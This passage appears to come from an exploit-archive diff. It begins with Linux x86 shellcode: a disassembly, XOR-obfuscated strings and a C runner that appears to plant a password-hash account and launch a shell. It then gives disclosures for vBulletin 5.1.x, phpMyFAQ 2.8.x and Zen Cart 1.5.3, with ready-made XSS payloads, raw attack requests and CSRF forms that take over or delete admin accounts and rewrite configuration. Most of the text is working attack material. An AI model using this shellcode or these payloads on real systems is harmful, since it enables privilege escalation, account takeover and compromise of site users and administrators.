78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@g3n3rall:~/Desktop/xpl#
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}

118
platforms/php/webapps/34579.txt Executable file
View file

@ -0,0 +1,118 @@
#Title: vBulletin 5.1.X - Cross Site Scripting
#Date: 05.09.14
#Version: => 5.1.2 (Latest ATM)
#Vendor: vbulletin.com
#Contact: smash [at] devilteam.pl
1) Agenda
Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
2) Vulnerability
First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
Let's take as example following address:
http://vbulletin/member/2-victim
1. Click 'Share photo' (camera icon), pick any image you like.
2. You may add comment about photo, all you need to do is to add js payload.
As comment, use something like - huh" onmouseover=alert(666) xss="
Request:
POST /ajax/render/editor_gallery_photoblock HTTP/1.1
Host: vbulletin
photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
3. Send image by clicking on 'Post' button.
Request:
POST /create-content/gallery HTTP/1.1
Host: vbulletin
Content-Type: multipart/form-data;
boundary=---------------------------18897880557155952661558219659
Content-Length: 1558
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="securitytoken"
1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="text"
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="uploadFrom"
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="filedataid[]"
13
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="title_13"
cool" onmouseover=alert(666) xssed="
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="uploadFrom"
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="securitytoken"
[TOKEN]
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="parentid"
8
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="setfor"
5
-----------------------------18897880557155952661558219659--
4. Done
At this point, victim should be noticed about new activity via 'Messages' tab:
"attacker has left you a visitor message"
Basically, you may use this XSS against any profile.
Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
When victim will click on image, js will be executed, and popup will appear.
Request:
GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
Host: vbulletin
Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By <a href=\"vbulletin\/member\/2-victim\">victim.victim@tlen.pl<\/a> in <a href=\"javascript:$('#slideshow-dialog').dialog('close');void(0);\">No Title<\/a><br \/>\n"}]}
3) TL;DR
- Visit victim profile
- Upload any image
- XSS in title (asdf" onmouseover=alert(666) xss=")
- Send

207
platforms/php/webapps/34580.txt Executable file
View file

@ -0,0 +1,207 @@
#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
#Vendor: phpmyfaq.de
#Date: 04.09.19
#Version: >= 2.8.12 (Latest ATM)
#Tested on: Apache 2.2 / PHP 5.4 / Linux
#Contact: smash [at] devilteam.pl
1) Persistent XSS
Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
For example, to view informations about session with ID 1, you need visit following address:
http://localhost/phpmyfaq/admin/?action=viewsession&id=1
Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
PoC:
<?php
$ch =curl_init("http://localhost/phpmyfaq/index.php");
curl_setopt($ch,CURLOPT_USERAGENT,'<script>alert(666)</script>');
curl_setopt($ch, CURLOPT_REFERER, '<script>alert(123)</script>');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Vuln (viewsession):
<tbody>
<tr>
<td>2014-09-04 02:22:04</td>
<td>new_session (0)</td>
</tr>
<tr>
<td>Referer:</td>
<td>
<a href="<script>alert(123)</script>" target="_blank">
<script>alert(123)</script> </a>
</td>
</tr>
<tr>
<td>Browser:</td>
<td><script>alert(666)</script></td>
</tr>
<tr>
<td>IP-Address:</td>
<td>::1</td>
</tr>
</tbody>
2) Remote FAQ Disclosure
Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
- Download
<html>
<body>
<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
<input type="hidden" name="catid" value="0" />
<input type="hidden" name="downwards" value="1" />
<input type="hidden" name="type" value="xml" />
<input type="hidden" name="dispos" value="attachment" />
<input type="hidden" name="submitExport" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- View
<html>
<body>
<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
<input type="hidden" name="catid" value="0" />
<input type="hidden" name="downwards" value="1" />
<input type="hidden" name="type" value="xml" />
<input type="hidden" name="dispos" value="inline" />
<input type="hidden" name="submitExport" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3) CSRF
- Edit user credentials (login/mail)
PoC:
<html>
<body>
<form action="http://localhost/phpmyfaq/admin/?action=user&user_action=update_data" method="POST">
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="user_status" value="active" />
<input type="hidden" name="display_name" value="haked" />
<input type="hidden" name="email" value="victim@vic.tim" />
<input type="hidden" name="last_modified" value="undefined" />
<input type="submit" value="Go" />
</form>
</body>
</html>
By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
- Delete user
http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
- Delete category
http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
- Delete session (month)
PoC:
<html>
<body>
<form action="http://localhost/phpmyfaq/admin/?action=viewsessions" method="POST">
<input type="hidden" name="month" value="092014" />
<input type="hidden" name="statdelete" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Delete logs older than 30 days
http://localhost/phpmyfaq/admin/?action=deleteadminlog
- Add stopword
http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
- Edit configuration
Affected:
Main configuration
FAQ records configuration
Search
Security configuration
Spam control center
Social network configuration
PoC:
<html>
<body>
<form action="http://localhost/phpmyfaq/admin/?action=config&config_action=saveConfig" method="POST">
<input type="hidden" name="edit[main.language]" value="language_en.php" />
<input type="hidden" name="edit[main.languageDetection]" value="true" />
<input type="hidden" name="edit[main.titleFAQ]" value="phpMyFAQ Codename Perdita" />
<input type="hidden" name="edit[main.currentVersion]" value="2.8.12" />
<input type="hidden" name="edit[main.metaDescription]" value="lolwat" />
<input type="hidden" name="edit[main.metaKeywords]" value="" />
<input type="hidden" name="edit[main.metaPublisher]" value="Whatever" />
<input type="hidden" name="edit[main.administrationMail]" value="what@ever.com" />
<input type="hidden" name="edit[main.contactInformations]" value="" />
<input type="hidden" name="edit[main.send2friendText]" value="" />
<input type="hidden" name="edit[main.enableUserTracking]" value="true" />
<input type="hidden" name="edit[main.enableAdminLog]" value="true" />
<input type="hidden" name="edit[main.referenceURL]" value="http://localhost/phpmyfaq" />
<input type="hidden" name="edit[main.urlValidateInterval]" value="86400" />
<input type="hidden" name="edit[main.enableWysiwygEditor]" value="true" />
<input type="hidden" name="edit[main.templateSet]" value="default" />
<input type="hidden" name="edit[main.dateFormat]" value="Y-m-d H:i" />
<input type="hidden" name="edit[records.maxAttachmentSize]" value="100000" />
<input type="hidden" name="edit[records.disableAttachments]" value="true" />
<input type="hidden" name="edit[records.numberOfRecordsPerPage]" value="10" />
<input type="hidden" name="edit[records.numberOfShownNewsEntries]" value="3" />
<input type="hidden" name="edit[records.numberOfRelatedArticles]" value="5" />
<input type="hidden" name="edit[records.orderby]" value="id" />
<input type="hidden" name="edit[records.sortby]" value="DESC" />
<input type="hidden" name="edit[records.attachmentsPath]" value="attachments" />
<input type="hidden" name="edit[records.defaultAttachmentEncKey]" value="" />
<input type="hidden" name="edit[records.orderingPopularFaqs]" value="visits" />
<input type="hidden" name="edit[records.autosaveSecs]" value="180" />
<input type="hidden" name="edit[search.numberSearchTerms]" value="10" />
<input type="hidden" name="edit[search.relevance]" value="thema,content,keywords" />
<input type="hidden" name="edit[security.bannedIPs]" value="" />
<input type="hidden" name="edit[security.permLevel]" value="basic" />
<input type="hidden" name="edit[security.ssoLogoutRedirect]" value="" />
<input type="hidden" name="edit[spam.enableSafeEmail]" value="true" />
<input type="hidden" name="edit[spam.checkBannedWords]" value="true" />
<input type="hidden" name="edit[spam.enableCaptchaCode]" value="true" />
<input type="hidden" name="edit[socialnetworks.twitterConsumerKey]" value="" />
<input type="hidden" name="edit[socialnetworks.twitterConsumerSecret]" value="" />
<input type="hidden" name="edit[socialnetworks.twitterAccessTokenKey]" value="" />
<input type="hidden" name="edit[socialnetworks.twitterAccessTokenSecret]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

712
platforms/php/webapps/34581.txt Executable file
View file

@ -0,0 +1,712 @@
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl
#1 - CSRF
- Delete admin
GET profile stands for user id.
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
- Reset layout boxes to default
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
#2 - Persistent XSS in admin panel
Since admin privileges are required to execute following vulnerablities this is not a serious threat.
- Extras -> Media types -> Add
Vulnerable parameters - type_name & type_exit
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"
<h1>sup<!--
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_ext"
sup<>
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="x"
19
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="y"
13
-----------------------------4978676881674017321390852339--
Response:
(...)
<td class="dataTableContent"><h1>sup<!--</td>
<td class="dataTableContent">sup<></td>
<td class="dataTableContent" align="right">
(...)
- Extras -> Media manager -> Add
Vulnerable parameter - media_name
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
Content-Length: 5633
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_name"
<script>alert(666)</script>
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="x"
32
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="y"
16
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
Content-Type: image/png
(image)
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_dir"
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_type"
2
-----------------------------1835318161847256146721022401--
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
</tr>
- Extras -> Music genre -> Add
Vulenrable parameter - music_genre_name
POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
Content-Length: 581
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="music_genre_name"
<script>alert(666)</script>
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="x"
37
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="y"
10
-----------------------------202746648818048680751007920584--
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
Response:
(...)
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
(...)
- Extras -> Record companies -> Add
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
Content-Length: 5828
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_name"
<script>alert(666)</script>
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
Content-Type: image/png
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="img_dir"
categories/
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image_manual"
/etc/passwd
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_url[1]"
'>"><>XSS
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="x"
21
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="y"
13
-----------------------------19884630671863875697751588711--
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
Response:
(...)
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
<div class="centerColumn" id="indexProductList">
<h1 id="productListHeading"><script>alert(666)</script></h1>
(...)
- Extras -> Recording Artists -> Add
Vulnerable parameter - artists_name
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
Content-Length: 1099
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="securityToken"
84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_name"
<script>alert(666)</script>
-----------------------------14015448418946681711346093460
(Content-Disposition: form-data; name="artists_image"; filename=""
Content-Type: application/octet-stream
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="img_dir"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_image_manual"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_url[1]"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="x"
39
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="y"
19
-----------------------------14015448418946681711346093460--)
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
- Gift Certificate/Coupons -> Coupon admin -> Add
Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: localhost
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10
Response:
(...)
<tr>
<td align="left">Coupon Name</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Description <br />(Customer can see)</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Amount</td>
<td align="left"></td>
</tr>
<tr>
<td align="left">Coupon Minimum Order</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Free Shipping</td>
<td align="left">Free Shipping</td>
</tr>
<tr>
<td align="left">Coupon Code</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Coupon</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Customer</td>
<td align="left">'>"><>XSSD</td>
</tr>
(...)
- Gift Certificate/Coupons -> Mail gift certificate -> Send
Vulnerable parameter - email_to
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
Host: localhost
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12
Response:
(...)
</tr>
<tr>
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
</tr>
<tr>
(...)
- Tools -> Banner manager -> Add
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
Content-Length: 2317
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="securityToken"
84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="status"
1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_open_new_windows"
0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_on_ssl"
1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_title"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_url"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_group"
BannersAll
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="new_banners_group"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image"; filename=""
Content-Type: application/octet-stream
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_local"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_target"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_html_text"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_sort_order"
15
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="date_scheduled"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_date"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_impressions"
0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="x"
9
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="y"
7
-----------------------------3847719184268426731396009422--
Response:
(...)
